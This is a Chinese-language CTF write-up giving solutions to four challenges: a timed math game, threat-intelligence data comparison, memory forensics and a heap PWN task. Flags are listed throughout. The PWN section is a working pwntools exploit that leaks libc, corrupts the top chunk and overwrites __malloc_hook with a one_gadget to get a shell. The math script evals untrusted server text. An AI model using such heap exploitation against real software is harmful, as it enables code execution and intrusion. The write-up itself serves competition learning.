Crypto-py-math-game
nc连接测试
根据要求三秒给出答案才能输出flag值
利用python编写exp进行处理
Exp:
import socket
import re
com = re.compile("n = (\d.*)")
c = socket.socket(2, 1)
c.connect(("39.104.54.154", 33057))
name = c.recv(1024).decode()
yunsuan = re.search("(n.*) = \?", name)
yn = yunsuan.groups()[0].replace("X","*")
value = com.search(name).groups()[0]
# print(yn, value)
print(name)
n = int(value)
n = eval(yn)
n = str(n) + "\n"
c.send(n.encode('utf-8'))
ddd = c.recv(1024)
print(ddd.decode())
while True:
c.send(input().encode('utf-8'))
ddd = c.recv(1024)
print(ddd.decode())
c.close()
Flag:flag{35946f7510}
MISC-威胁情报分析2
两个文件进行数据对比,利用python编写脚本对数据文件进行分析
发现可疑数据
Flag:flag{lprbriry.net}
MISC-内存取证
直接将lm-lime文件放在HxD中去进行检索得flagbase64编码后的字符串
对base64进行解码得flag
Flag:flag{12qwaszxcde3}
PWN-leak
分析
跟进sub_9BF()
sub_ABC()
EXP:
from pwn import *
def s(a): p.send(a)
def sa(a, b): p.sendafter(a, b)
def sl(a): p.sendline(a)
def sla(a, b): p.sendlineafter(a, b)
def r(): p.recv()
def pr(): print(p.recv())
def rl(a): return p.recvuntil(a)
context(os='linux', arch='amd64', log_level='debug')
#p = process('./leak')
p = remote('', )
elf = ELF('./leak')
libc = ELF('./libc-2.27.so')
def add(idx, size):
sla(b': ', b'1')
sla(b': ', str(idx))
sla(b': ', str(size))
def edit(idx, data):
sla(b': ', b'2')
sla(b': ', str(idx))
sa(b': ', data)
def show(idx):
sla(b': ', b'3')
sla(b': ', str(idx))
def free(idx):
sla(b': ', b'4')
sla(b': ', str(idx))
add(0, 0x18)
edit(0, p64(0)*3 + p64(0xd91))
add(1, 0x1008)
add(2, 0xd50)
show(2)
x = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = x - 0x3ec2a0
malloc_hook = libc_base + libc.sym['__malloc_hook']
one_gadget = libc_base + 0x10a2fc
edit(1, b'\x00'*0x1008 + p64(0xffffffffffffffff))
add(3, - 0x22010)
add(4, 0x100)
edit(4, b'\x07'*0x30 + p64(malloc_hook)*0x10 + b'\n')
add(5, 0xa0)
edit(5, p64(one_gadget) + b'\n')
add(6, 0x200)
p.interactive()
Flag:flag{8ac27ed206}
Flag:flag{8ac27ed206}